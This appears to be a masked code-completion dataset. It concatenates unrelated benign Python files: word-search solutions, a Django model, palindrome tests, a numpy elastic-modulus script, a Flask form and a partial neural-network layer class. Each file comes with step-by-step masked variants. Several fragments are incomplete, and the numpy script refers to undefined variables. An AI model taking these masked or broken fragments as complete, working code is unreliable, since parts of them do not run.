<|reserved_special_token_1|>
class Solution(object):
<|reserved_special_token_0|>
class Solution(object):
def exist(self, board, word):
"""
:type board: List[List[str]]
:type word: str
:rtype: bool
"""
def dfs(i, j, word, visited=set()):
if not word:
return True
for ni, nj in ((i + 1, j), (i - 1, j), (i, j + 1), (i, j - 1)):
if 0 <= ni < m and 0 <= nj < n and (ni, nj) not in visited:
if board[ni][nj] == word[0]:
if dfs(ni, nj, word[1:], visited | {(ni, nj)}):
return True
return False
m, n = len(board), len(board[0])
for i in range(m):
for j in range(n):
if board[i][j] == word[0]:
if dfs(i, j, word[1:], set([(i, j)])):
return True
return False
<|reserved_special_token_1|>
class Solution(object):
def exist(self, board, word):
"""
:type board: List[List[str]]
:type word: str
:rtype: bool
"""
if not board or not board[0]:
return not word
self.length = len(word)
def hasPathCore(row, col, depth=0):
if self.length == depth:
return True
hasPath = False
if 0 <= row and row < len(board) and 0 <= col and col < len(board
[0]) and board[row][col] == word[depth] and not visited[row][
col]:
visited[row][col] = True
up = hasPathCore(row - 1, col, depth + 1)
down = hasPathCore(row + 1, col, depth + 1)
left = hasPathCore(row, col - 1, depth + 1)
right = hasPathCore(row, col + 1, depth + 1)
hasPath = up or down or left or right
if not hasPath:
visited[row][col] = False
return hasPath
visited = [([False] * len(board[0])) for _ in range(len(board))]
for i in range(len(board)):
for j in range(len(board[0])):
if hasPathCore(i, j, 0):
return True
return False
class Solution(object):
def exist(self, board, word):
"""
:type board: List[List[str]]
:type word: str
:rtype: bool
"""
def dfs(i, j, word, visited=set()):
if not word:
return True
for ni, nj in ((i + 1, j), (i - 1, j), (i, j + 1), (i, j - 1)):
if 0 <= ni < m and 0 <= nj < n and (ni, nj) not in visited:
if board[ni][nj] == word[0]:
if dfs(ni, nj, word[1:], visited | {(ni, nj)}):
return True
return False
m, n = len(board), len(board[0])
for i in range(m):
for j in range(n):
if board[i][j] == word[0]:
if dfs(i, j, word[1:], set([(i, j)])):
return True
return False
<|reserved_special_token_1|>
class Solution(object):
def exist(self, board, word):
"""
:type board: List[List[str]]
:type word: str
:rtype: bool
"""
if not board or not board[0]: return not word
self.length = len(word)
def hasPathCore(row, col, depth=0):
if self.length == depth:
return True
hasPath = False
if 0 <= row and row < len(board) and \
0 <= col and col < len(board[0]) and \
board[row][col] == word[depth] and \
not visited[row][col]:
visited[row][col] = True
up = hasPathCore(row - 1, col, depth + 1)
down = hasPathCore(row + 1, col, depth + 1)
left = hasPathCore(row, col - 1, depth + 1)
right = hasPathCore(row, col + 1, depth + 1)
hasPath = up or down or left or right
if not hasPath:
visited[row][col] = False
return hasPath
visited = [[False] * len(board[0]) for _ in range(len(board))]
for i in range(len(board)):
for j in range(len(board[0])):
if hasPathCore(i, j, 0): return True
return False
# python, dfs解法
class Solution(object):
def exist(self, board, word):
"""
:type board: List[List[str]]
:type word: str
:rtype: bool
"""
def dfs(i, j, word, visited=set()):
# Base case
if not word:
return True
for ni, nj in ((i + 1, j), (i - 1, j), (i, j + 1), (i, j - 1)):
# 搜索相邻的,且没有被访问过的位置
if 0 <= ni < m and 0 <= nj < n and (ni, nj) not in visited:
# 这个位置字符和word开头对上了
if board[ni][nj] == word[0]:
# 在下一层中,找到了一个成功的方向,即刻返回true
if dfs(ni, nj, word[1:], visited | {(ni, nj)}):
return True
return False
m, n = len(board), len(board[0])
for i in range(m):
for j in range(n):
# 开头对上了,进入下一层寻找
if board[i][j] == word[0]:
# 剩下的依然匹配,则返回true
if dfs(i, j, word[1:], set([(i, j)])):
return True
return False
|
flexible
|
{
"blob_id": "9b8db3407313a3e39d429b7c10897fc447fcdc27",
"index": 1337,
"step-1": "<mask token>\n\n\nclass Solution(object):\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass Solution(object):\n\n def exist(self, board, word):\n \"\"\"\n :type board: List[List[str]]\n :type word: str\n :rtype: bool\n \"\"\"\n\n def dfs(i, j, word, visited=set()):\n if not word:\n return True\n for ni, nj in ((i + 1, j), (i - 1, j), (i, j + 1), (i, j - 1)):\n if 0 <= ni < m and 0 <= nj < n and (ni, nj) not in visited:\n if board[ni][nj] == word[0]:\n if dfs(ni, nj, word[1:], visited | {(ni, nj)}):\n return True\n return False\n m, n = len(board), len(board[0])\n for i in range(m):\n for j in range(n):\n if board[i][j] == word[0]:\n if dfs(i, j, word[1:], set([(i, j)])):\n return True\n return False\n",
"step-3": "class Solution(object):\n <mask token>\n\n\nclass Solution(object):\n\n def exist(self, board, word):\n \"\"\"\n :type board: List[List[str]]\n :type word: str\n :rtype: bool\n \"\"\"\n\n def dfs(i, j, word, visited=set()):\n if not word:\n return True\n for ni, nj in ((i + 1, j), (i - 1, j), (i, j + 1), (i, j - 1)):\n if 0 <= ni < m and 0 <= nj < n and (ni, nj) not in visited:\n if board[ni][nj] == word[0]:\n if dfs(ni, nj, word[1:], visited | {(ni, nj)}):\n return True\n return False\n m, n = len(board), len(board[0])\n for i in range(m):\n for j in range(n):\n if board[i][j] == word[0]:\n if dfs(i, j, word[1:], set([(i, j)])):\n return True\n return False\n",
"step-4": "class Solution(object):\n\n def exist(self, board, word):\n \"\"\"\n :type board: List[List[str]]\n :type word: str\n :rtype: bool\n \"\"\"\n if not board or not board[0]:\n return not word\n self.length = len(word)\n\n def hasPathCore(row, col, depth=0):\n if self.length == depth:\n return True\n hasPath = False\n if 0 <= row and row < len(board) and 0 <= col and col < len(board\n [0]) and board[row][col] == word[depth] and not visited[row][\n col]:\n visited[row][col] = True\n up = hasPathCore(row - 1, col, depth + 1)\n down = hasPathCore(row + 1, col, depth + 1)\n left = hasPathCore(row, col - 1, depth + 1)\n right = hasPathCore(row, col + 1, depth + 1)\n hasPath = up or down or left or right\n if not hasPath:\n visited[row][col] = False\n return hasPath\n visited = [([False] * len(board[0])) for _ in range(len(board))]\n for i in range(len(board)):\n for j in range(len(board[0])):\n if hasPathCore(i, j, 0):\n return True\n return False\n\n\nclass Solution(object):\n\n def exist(self, board, word):\n \"\"\"\n :type board: List[List[str]]\n :type word: str\n :rtype: bool\n \"\"\"\n\n def dfs(i, j, word, visited=set()):\n if not word:\n return True\n for ni, nj in ((i + 1, j), (i - 1, j), (i, j + 1), (i, j - 1)):\n if 0 <= ni < m and 0 <= nj < n and (ni, nj) not in visited:\n if board[ni][nj] == word[0]:\n if dfs(ni, nj, word[1:], visited | {(ni, nj)}):\n return True\n return False\n m, n = len(board), len(board[0])\n for i in range(m):\n for j in range(n):\n if board[i][j] == word[0]:\n if dfs(i, j, word[1:], set([(i, j)])):\n return True\n return False\n",
"step-5": "class Solution(object):\n def exist(self, board, word):\n \"\"\"\n :type board: List[List[str]]\n :type word: str\n :rtype: bool\n \"\"\"\n if not board or not board[0]: return not word\n self.length = len(word)\n def hasPathCore(row, col, depth=0):\n if self.length == depth:\n return True\n hasPath = False\n if 0 <= row and row < len(board) and \\\n 0 <= col and col < len(board[0]) and \\\n board[row][col] == word[depth] and \\\n not visited[row][col]:\n visited[row][col] = True\n up = hasPathCore(row - 1, col, depth + 1)\n down = hasPathCore(row + 1, col, depth + 1)\n left = hasPathCore(row, col - 1, depth + 1)\n right = hasPathCore(row, col + 1, depth + 1)\n hasPath = up or down or left or right\n if not hasPath:\n visited[row][col] = False\n return hasPath\n \n visited = [[False] * len(board[0]) for _ in range(len(board))]\n for i in range(len(board)):\n for j in range(len(board[0])):\n if hasPathCore(i, j, 0): return True\n return False\n\n# python, dfs解法\nclass Solution(object):\n def exist(self, board, word):\n \"\"\"\n :type board: List[List[str]]\n :type word: str\n :rtype: bool\n \"\"\"\n def dfs(i, j, word, visited=set()):\n # Base case\n if not word:\n return True\n for ni, nj in ((i + 1, j), (i - 1, j), (i, j + 1), (i, j - 1)):\n # 搜索相邻的,且没有被访问过的位置\n if 0 <= ni < m and 0 <= nj < n and (ni, nj) not in visited:\n # 这个位置字符和word开头对上了\n if board[ni][nj] == word[0]:\n # 在下一层中,找到了一个成功的方向,即刻返回true\n if dfs(ni, nj, word[1:], visited | {(ni, nj)}):\n return True\n return False\n\n m, n = len(board), len(board[0])\n for i in range(m):\n for j in range(n):\n # 开头对上了,进入下一层寻找\n if board[i][j] == word[0]:\n # 剩下的依然匹配,则返回true\n if dfs(i, j, word[1:], set([(i, j)])):\n return True\n return False\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
# -*- coding: utf-8 -*-
from django.db import models
from django.contrib.auth.models import User
from django import forms
from django.utils.translation import ugettext_lazy as _
from django.contrib.auth.models import User
TYPE_ENT = (
( 'ROOT' , 'ROOT' ),
( 'TIERS', 'TIERS'),
)
class EntiteClass(models.Model):
codent = models.CharField(_(u'Code Entite'),max_length=20, unique=True)
noment = models.CharField(_(u'Nom Entite'),max_length=40)
description = models.TextField(_(u'Description'))
typent = models.CharField(_(u'Type Entite'), max_length=10, choices=TYPE_ENT )
def __unicode__(self):
return "%s : %s" % (self.codent, self.noment)
class UserProfile(models.Model):
# This field is required.
user = models.OneToOneField(User)
tiers = models.ForeignKey(EntiteClass)
def __unicode__(self):
return "%s : %s" % (self.user, self.tiers)
@property
def list_name(self):
t = EntiteClass.objects.get(id=self.tiers)
u = User.objects.get(id=self.user)
l_name = "%s - %s" % (u.username, t.noment)
return "%s" % l_name
|
normal
|
{
"blob_id": "a094207b2cd9a5a4bd409ac8a644268f3808e346",
"index": 7023,
"step-1": "<mask token>\n\n\nclass UserProfile(models.Model):\n <mask token>\n <mask token>\n\n def __unicode__(self):\n return '%s : %s' % (self.user, self.tiers)\n\n @property\n def list_name(self):\n t = EntiteClass.objects.get(id=self.tiers)\n u = User.objects.get(id=self.user)\n l_name = '%s - %s' % (u.username, t.noment)\n return '%s' % l_name\n",
"step-2": "<mask token>\n\n\nclass UserProfile(models.Model):\n user = models.OneToOneField(User)\n tiers = models.ForeignKey(EntiteClass)\n\n def __unicode__(self):\n return '%s : %s' % (self.user, self.tiers)\n\n @property\n def list_name(self):\n t = EntiteClass.objects.get(id=self.tiers)\n u = User.objects.get(id=self.user)\n l_name = '%s - %s' % (u.username, t.noment)\n return '%s' % l_name\n",
"step-3": "<mask token>\n\n\nclass EntiteClass(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __unicode__(self):\n return '%s : %s' % (self.codent, self.noment)\n\n\nclass UserProfile(models.Model):\n user = models.OneToOneField(User)\n tiers = models.ForeignKey(EntiteClass)\n\n def __unicode__(self):\n return '%s : %s' % (self.user, self.tiers)\n\n @property\n def list_name(self):\n t = EntiteClass.objects.get(id=self.tiers)\n u = User.objects.get(id=self.user)\n l_name = '%s - %s' % (u.username, t.noment)\n return '%s' % l_name\n",
"step-4": "from django.db import models\nfrom django.contrib.auth.models import User\nfrom django import forms\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.contrib.auth.models import User\nTYPE_ENT = ('ROOT', 'ROOT'), ('TIERS', 'TIERS')\n\n\nclass EntiteClass(models.Model):\n codent = models.CharField(_(u'Code Entite'), max_length=20, unique=True)\n noment = models.CharField(_(u'Nom Entite'), max_length=40)\n description = models.TextField(_(u'Description'))\n typent = models.CharField(_(u'Type Entite'), max_length=10, choices=\n TYPE_ENT)\n\n def __unicode__(self):\n return '%s : %s' % (self.codent, self.noment)\n\n\nclass UserProfile(models.Model):\n user = models.OneToOneField(User)\n tiers = models.ForeignKey(EntiteClass)\n\n def __unicode__(self):\n return '%s : %s' % (self.user, self.tiers)\n\n @property\n def list_name(self):\n t = EntiteClass.objects.get(id=self.tiers)\n u = User.objects.get(id=self.user)\n l_name = '%s - %s' % (u.username, t.noment)\n return '%s' % l_name\n",
"step-5": "# -*- coding: utf-8 -*-\n\nfrom django.db import models\n\nfrom django.contrib.auth.models import User\nfrom django import forms\n\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.contrib.auth.models import User\n\nTYPE_ENT = (\n ( 'ROOT' , 'ROOT' ),\n\t( 'TIERS', 'TIERS'),\n\t\t)\n\nclass EntiteClass(models.Model):\n\tcodent = models.CharField(_(u'Code Entite'),max_length=20, unique=True)\n\tnoment = models.CharField(_(u'Nom Entite'),max_length=40)\n\tdescription = models.TextField(_(u'Description'))\n\ttypent = models.CharField(_(u'Type Entite'), max_length=10, choices=TYPE_ENT )\n\n\tdef __unicode__(self):\n\t\treturn \"%s : %s\" % (self.codent, self.noment)\n\nclass UserProfile(models.Model):\n # This field is required.\n\tuser = models.OneToOneField(User)\n\ttiers = models.ForeignKey(EntiteClass)\n\n\tdef __unicode__(self):\n\t\treturn \"%s : %s\" % (self.user, self.tiers)\n\n\t@property\n\tdef list_name(self):\n\t\tt = EntiteClass.objects.get(id=self.tiers)\n\t\tu = User.objects.get(id=self.user)\n\t\tl_name = \"%s - %s\" % (u.username, t.noment)\n\t\treturn \"%s\" % l_name\n",
"step-ids": [
3,
4,
6,
9,
10
]
}
|
[
3,
4,
6,
9,
10
] |
from unittest import TestCase
# auto-test toggled test class to monitor changes to is_palindrome function
class Test_is_palindrome(TestCase):
def test_is_palindrome(self):
from identify_a_palindrome import is_palindrome
self.assertTrue(is_palindrome("Asdfdsa"))
self.assertTrue(is_palindrome("asDf'ssfdsa"))
def test_is_palindrome_with_non_alpha(self):
from identify_a_palindrome import is_palindrome
self.assertTrue(is_palindrome("asdf'ssfdsa"))
def test_is_not_palindrome(self):
from identify_a_palindrome import is_palindrome
self.assertFalse(is_palindrome("asdfddsa"))
self.assertFalse(is_palindrome("hello world"))
|
normal
|
{
"blob_id": "785b54dce76d6906df513a8bde0110ab6fd63357",
"index": 7083,
"step-1": "<mask token>\n\n\nclass Test_is_palindrome(TestCase):\n <mask token>\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass Test_is_palindrome(TestCase):\n\n def test_is_palindrome(self):\n from identify_a_palindrome import is_palindrome\n self.assertTrue(is_palindrome('Asdfdsa'))\n self.assertTrue(is_palindrome(\"asDf'ssfdsa\"))\n\n def test_is_palindrome_with_non_alpha(self):\n from identify_a_palindrome import is_palindrome\n self.assertTrue(is_palindrome(\"asdf'ssfdsa\"))\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Test_is_palindrome(TestCase):\n\n def test_is_palindrome(self):\n from identify_a_palindrome import is_palindrome\n self.assertTrue(is_palindrome('Asdfdsa'))\n self.assertTrue(is_palindrome(\"asDf'ssfdsa\"))\n\n def test_is_palindrome_with_non_alpha(self):\n from identify_a_palindrome import is_palindrome\n self.assertTrue(is_palindrome(\"asdf'ssfdsa\"))\n\n def test_is_not_palindrome(self):\n from identify_a_palindrome import is_palindrome\n self.assertFalse(is_palindrome('asdfddsa'))\n self.assertFalse(is_palindrome('hello world'))\n",
"step-4": "from unittest import TestCase\n\n\nclass Test_is_palindrome(TestCase):\n\n def test_is_palindrome(self):\n from identify_a_palindrome import is_palindrome\n self.assertTrue(is_palindrome('Asdfdsa'))\n self.assertTrue(is_palindrome(\"asDf'ssfdsa\"))\n\n def test_is_palindrome_with_non_alpha(self):\n from identify_a_palindrome import is_palindrome\n self.assertTrue(is_palindrome(\"asdf'ssfdsa\"))\n\n def test_is_not_palindrome(self):\n from identify_a_palindrome import is_palindrome\n self.assertFalse(is_palindrome('asdfddsa'))\n self.assertFalse(is_palindrome('hello world'))\n",
"step-5": "from unittest import TestCase\n\n# auto-test toggled test class to monitor changes to is_palindrome function\nclass Test_is_palindrome(TestCase):\n def test_is_palindrome(self):\n from identify_a_palindrome import is_palindrome\n self.assertTrue(is_palindrome(\"Asdfdsa\"))\n self.assertTrue(is_palindrome(\"asDf'ssfdsa\"))\n\n def test_is_palindrome_with_non_alpha(self):\n from identify_a_palindrome import is_palindrome\n self.assertTrue(is_palindrome(\"asdf'ssfdsa\"))\n\n def test_is_not_palindrome(self):\n from identify_a_palindrome import is_palindrome\n self.assertFalse(is_palindrome(\"asdfddsa\"))\n self.assertFalse(is_palindrome(\"hello world\"))\n",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
#%%
import numpy
import time
import scipy
import os
os.chdir('/home/bbales2/modal')
import pyximport
import seaborn
pyximport.install(reload_support = True)
import polybasisqu
reload(polybasisqu)
#from rotations import symmetry
#from rotations import quaternion
#from rotations import inv_rotations
# basis polynomials are x^n * y^m * z^l where n + m + l <= N
N = 14
density = 8700.0 #4401.695921#
# Dimensions -- watch the scaling
X = .011 #0.007753#
Y = .013 #0.009057#
Z = .019 #0.013199#
c11 = 2.6
anisotropic = 2.8421
c44 = 1.35
c12 = -(c44 * 2.0 / anisotropic - c11)
# Standard deviation around each mode prediction
std = 1.0
# Rotations
w = 1.0
x = 0.0
y = 0.0
z = 0.0
# These are the sampled modes in khz
# Frequencies from SXSA
data = numpy.array([
68.066,
87.434,
104.045,
105.770,
115.270,
122.850,
131.646,
137.702,
139.280,
149.730,
156.548,
156.790,
169.746,
172.139,
173.153,
178.047,
183.433,
188.288,
197.138,
197.869,
198.128,
203.813,
206.794,
212.173,
212.613,
214.528,
215.840,
221.452,
227.569,
232.430])
#%%
c12 = -(c44 * 2.0 / anisotropic - c11)
dp, pv, ddpdX, ddpdY, ddpdZ, dpvdX, dpvdY, dpvdZ = polybasisqu.build(N, X, Y, Z)
C = numpy.array([[c11, c12, c12, 0, 0, 0],
[c12, c11, c12, 0, 0, 0],
[c12, c12, c11, 0, 0, 0],
[0, 0, 0, c44, 0, 0],
[0, 0, 0, 0, c44, 0],
[0, 0, 0, 0, 0, c44]])
w, x, y, z = 0.594755820, -0.202874980, 0.640151553, 0.441942582
#w, x, y, z = 1.0, 0.0, 0.0, 0.0
#w, x, y, z = [0.87095, 0.17028, 0.03090, 0.45989]
#w, x, y, z = [0.93894, -0.09845, -0.14279, -0.29717]
C, dCdw, dCdx, dCdy, dCdz, Kt = polybasisqu.buildRot(C, w, x, y, z)
K, M = polybasisqu.buildKM(C, dp, pv, density)
eigs2, evecs = scipy.linalg.eigh(K, M, eigvals = (6, 6 + 30 - 1))
freqs = numpy.sqrt(eigs2 * 1e11) / (numpy.pi * 2000)
print "computed, accepted"
for e1, dat in zip(freqs, data):
print "{0:0.5f} {1:0.3f}".format(e1, dat)
#freqs + 0.25 * numpy.random.randn(len(freqs))
#%%
dCdc11 = numpy.array([[1, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0],
[0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0]], dtype = 'float64')
dCdc11 = Kt.dot(dCdc11).dot(Kt.T)
dCdc12 = numpy.array([[0, 1, 1, 0, 0, 0],
[1, 0, 1, 0, 0, 0],
[1, 1, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0]], dtype = 'float64')
dCdc12 = Kt.dot(dCdc12).dot(Kt.T)
dCdc44 = numpy.array([[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 1, 0, 0],
[0, 0, 0, 0, 1, 0],
[0, 0, 0, 0, 0, 1]], dtype = 'float64')
dCdc44 = Kt.dot(dCdc44).dot(Kt.T)
if True:
dKdw, _ = polybasisqu.buildKM(dCdw, dp, pv, density)
dKdx, _ = polybasisqu.buildKM(dCdx, dp, pv, density)
dKdy, _ = polybasisqu.buildKM(dCdy, dp, pv, density)
dKdz, _ = polybasisqu.buildKM(dCdz, dp, pv, density)
dKdc11, _ = polybasisqu.buildKM(dCdc11, dp, pv, density)
dKdc12, _ = polybasisqu.buildKM(dCdc12, dp, pv, density)
dKdc44, _ = polybasisqu.buildKM(dCdc44, dp, pv, density)
dldw = numpy.array([evecs[:, i].T.dot(dKdw.dot(evecs[:, i])) for i in range(evecs.shape[1])])
dldx = numpy.array([evecs[:, i].T.dot(dKdx.dot(evecs[:, i])) for i in range(evecs.shape[1])])
dldy = numpy.array([evecs[:, i].T.dot(dKdy.dot(evecs[:, i])) for i in range(evecs.shape[1])])
dldz = numpy.array([evecs[:, i].T.dot(dKdz.dot(evecs[:, i])) for i in range(evecs.shape[1])])
dldc11 = numpy.array([evecs[:, i].T.dot(dKdc11.dot(evecs[:, i])) for i in range(evecs.shape[1])])
dldc12 = numpy.array([evecs[:, i].T.dot(dKdc12.dot(evecs[:, i])) for i in range(evecs.shape[1])])
dldc44 = numpy.array([evecs[:, i].T.dot(dKdc44.dot(evecs[:, i])) for i in range(evecs.shape[1])])
#%%
for a, b, c in zip(dldc11, dldc12, dldc44):
print a, b, c
#%%
for f1, f2, f3 in zip(freqs1, freqs2, freqs3[:30]):
print ", ".join(["{0:.2f}".format(a) for a in [f1, f2, f3]])
#%%
print "minimum (y = -0.015), y = 0.0, measured, error vs. y = -0.015, error vs. y = 0.0"
for e1, e2, dat in zip(eigs, eigs2, data):
print "{0:0.3f} {1:0.3f} {2:0.3f} {3:0.3f} {4:0.3f}".format(e1, e2, dat, numpy.abs(e1 - dat), numpy.abs(e2 - dat))
|
normal
|
{
"blob_id": "87df5481cf2dd5bb990a9b4bd5169d9293d6af79",
"index": 1144,
"step-1": "#%%\nimport numpy\nimport time\nimport scipy\nimport os\nos.chdir('/home/bbales2/modal')\nimport pyximport\nimport seaborn\npyximport.install(reload_support = True)\n\nimport polybasisqu\nreload(polybasisqu)\n\n#from rotations import symmetry\n#from rotations import quaternion\n#from rotations import inv_rotations\n\n# basis polynomials are x^n * y^m * z^l where n + m + l <= N\nN = 14\n\ndensity = 8700.0 #4401.695921#\n\n# Dimensions -- watch the scaling\nX = .011 #0.007753#\nY = .013 #0.009057#\nZ = .019 #0.013199#\n\nc11 = 2.6\nanisotropic = 2.8421\nc44 = 1.35\nc12 = -(c44 * 2.0 / anisotropic - c11)\n\n# Standard deviation around each mode prediction\nstd = 1.0\n\n# Rotations\nw = 1.0\nx = 0.0\ny = 0.0\nz = 0.0\n\n# These are the sampled modes in khz\n\n# Frequencies from SXSA\ndata = numpy.array([\n68.066,\n87.434,\n104.045,\n105.770,\n115.270,\n122.850,\n131.646,\n137.702,\n139.280,\n149.730,\n156.548,\n156.790,\n169.746,\n172.139,\n173.153,\n178.047,\n183.433,\n188.288,\n197.138,\n197.869,\n198.128,\n203.813,\n206.794,\n212.173,\n212.613,\n214.528,\n215.840,\n221.452,\n227.569,\n232.430])\n\n#%%\n\nc12 = -(c44 * 2.0 / anisotropic - c11)\n\ndp, pv, ddpdX, ddpdY, ddpdZ, dpvdX, dpvdY, dpvdZ = polybasisqu.build(N, X, Y, Z)\n\nC = numpy.array([[c11, c12, c12, 0, 0, 0],\n [c12, c11, c12, 0, 0, 0],\n [c12, c12, c11, 0, 0, 0],\n [0, 0, 0, c44, 0, 0],\n [0, 0, 0, 0, c44, 0],\n [0, 0, 0, 0, 0, c44]])\n\nw, x, y, z = 0.594755820, -0.202874980, 0.640151553, 0.441942582\n#w, x, y, z = 1.0, 0.0, 0.0, 0.0\n#w, x, y, z = [0.87095, 0.17028, 0.03090, 0.45989]\n#w, x, y, z = [0.93894, -0.09845, -0.14279, -0.29717]\n\nC, dCdw, dCdx, dCdy, dCdz, Kt = polybasisqu.buildRot(C, w, x, y, z)\nK, M = polybasisqu.buildKM(C, dp, pv, density)\neigs2, evecs = scipy.linalg.eigh(K, M, eigvals = (6, 6 + 30 - 1))\n\nfreqs = numpy.sqrt(eigs2 * 1e11) / (numpy.pi * 2000)\n\nprint \"computed, accepted\"\nfor e1, dat in zip(freqs, data):\n print \"{0:0.5f} {1:0.3f}\".format(e1, 
dat)\n\n#freqs + 0.25 * numpy.random.randn(len(freqs))\n#%%\ndCdc11 = numpy.array([[1, 0, 0, 0, 0, 0],\n [0, 1, 0, 0, 0, 0],\n [0, 0, 1, 0, 0, 0],\n [0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0]], dtype = 'float64')\n\ndCdc11 = Kt.dot(dCdc11).dot(Kt.T)\n\ndCdc12 = numpy.array([[0, 1, 1, 0, 0, 0],\n [1, 0, 1, 0, 0, 0],\n [1, 1, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0]], dtype = 'float64')\n\ndCdc12 = Kt.dot(dCdc12).dot(Kt.T)\n\ndCdc44 = numpy.array([[0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0],\n [0, 0, 0, 1, 0, 0],\n [0, 0, 0, 0, 1, 0],\n [0, 0, 0, 0, 0, 1]], dtype = 'float64')\n\ndCdc44 = Kt.dot(dCdc44).dot(Kt.T)\n\nif True:\n dKdw, _ = polybasisqu.buildKM(dCdw, dp, pv, density)\n dKdx, _ = polybasisqu.buildKM(dCdx, dp, pv, density)\n dKdy, _ = polybasisqu.buildKM(dCdy, dp, pv, density)\n dKdz, _ = polybasisqu.buildKM(dCdz, dp, pv, density)\n\n dKdc11, _ = polybasisqu.buildKM(dCdc11, dp, pv, density)\n dKdc12, _ = polybasisqu.buildKM(dCdc12, dp, pv, density)\n dKdc44, _ = polybasisqu.buildKM(dCdc44, dp, pv, density)\n\n dldw = numpy.array([evecs[:, i].T.dot(dKdw.dot(evecs[:, i])) for i in range(evecs.shape[1])])\n dldx = numpy.array([evecs[:, i].T.dot(dKdx.dot(evecs[:, i])) for i in range(evecs.shape[1])])\n dldy = numpy.array([evecs[:, i].T.dot(dKdy.dot(evecs[:, i])) for i in range(evecs.shape[1])])\n dldz = numpy.array([evecs[:, i].T.dot(dKdz.dot(evecs[:, i])) for i in range(evecs.shape[1])])\n dldc11 = numpy.array([evecs[:, i].T.dot(dKdc11.dot(evecs[:, i])) for i in range(evecs.shape[1])])\n dldc12 = numpy.array([evecs[:, i].T.dot(dKdc12.dot(evecs[:, i])) for i in range(evecs.shape[1])])\n dldc44 = numpy.array([evecs[:, i].T.dot(dKdc44.dot(evecs[:, i])) for i in range(evecs.shape[1])])\n#%%\nfor a, b, c in zip(dldc11, dldc12, dldc44):\n print a, b, c\n#%%\nfor f1, f2, f3 in zip(freqs1, freqs2, freqs3[:30]):\n print \", \".join([\"{0:.2f}\".format(a) for a in [f1, f2, f3]])\n#%%\n\nprint 
\"minimum (y = -0.015), y = 0.0, measured, error vs. y = -0.015, error vs. y = 0.0\"\nfor e1, e2, dat in zip(eigs, eigs2, data):\n print \"{0:0.3f} {1:0.3f} {2:0.3f} {3:0.3f} {4:0.3f}\".format(e1, e2, dat, numpy.abs(e1 - dat), numpy.abs(e2 - dat))\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
from flask_wtf import FlaskForm
from wtforms import StringField, SubmitField
from wtforms.validators import DataRequired, Length
from flask_ckeditor import CKEditorField
class BoldifyEncryptForm(FlaskForm):
boldMessage = StringField('Bolded Message: ', validators=[DataRequired()])
submit = SubmitField('Submit')
|
normal
|
{
"blob_id": "77b43d7d9cd6b912bcee471c564b47d7a7cdd552",
"index": 6227,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass BoldifyEncryptForm(FlaskForm):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass BoldifyEncryptForm(FlaskForm):\n boldMessage = StringField('Bolded Message: ', validators=[DataRequired()])\n submit = SubmitField('Submit')\n",
"step-4": "from flask_wtf import FlaskForm\nfrom wtforms import StringField, SubmitField\nfrom wtforms.validators import DataRequired, Length\nfrom flask_ckeditor import CKEditorField\n\n\nclass BoldifyEncryptForm(FlaskForm):\n boldMessage = StringField('Bolded Message: ', validators=[DataRequired()])\n submit = SubmitField('Submit')\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
def power_func(x, y, a=1, b=0):
return a * x ** y + b
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def power_func(x, y, a=1, b=0):
return a * x ** y + b
<|reserved_special_token_0|>
print(new_func(4, b=1))
print(new_func(1))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def power_func(x, y, a=1, b=0):
return a * x ** y + b
new_func = partial(power_func, 2, a=4)
print(new_func(4, b=1))
print(new_func(1))
<|reserved_special_token_1|>
from functools import partial
def power_func(x, y, a=1, b=0):
return a * x ** y + b
new_func = partial(power_func, 2, a=4)
print(new_func(4, b=1))
print(new_func(1))
|
flexible
|
{
"blob_id": "c9f1768e2f2dd47d637c2e577067eb6cd163e972",
"index": 8331,
"step-1": "<mask token>\n\n\ndef power_func(x, y, a=1, b=0):\n return a * x ** y + b\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef power_func(x, y, a=1, b=0):\n return a * x ** y + b\n\n\n<mask token>\nprint(new_func(4, b=1))\nprint(new_func(1))\n",
"step-3": "<mask token>\n\n\ndef power_func(x, y, a=1, b=0):\n return a * x ** y + b\n\n\nnew_func = partial(power_func, 2, a=4)\nprint(new_func(4, b=1))\nprint(new_func(1))\n",
"step-4": "from functools import partial\n\n\ndef power_func(x, y, a=1, b=0):\n return a * x ** y + b\n\n\nnew_func = partial(power_func, 2, a=4)\nprint(new_func(4, b=1))\nprint(new_func(1))\n",
"step-5": null,
"step-ids": [
1,
2,
3,
4
]
}
|
[
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class LayerBase(object):
def __init__(self, units_count, activation_func):
self.current_layer_dim = units_count
self.activation_func = activation_func
self.weights = None
self.bias = None
self.pre_activation = None
self.activation_layer = None
self.activation = None
self.d_weights = None
self.d_bias = None
self.d_activation = None
def __if_params_not_initialized(self):
return self.weights is None or self.bias is None
<|reserved_special_token_0|>
def __forward_linear(self):
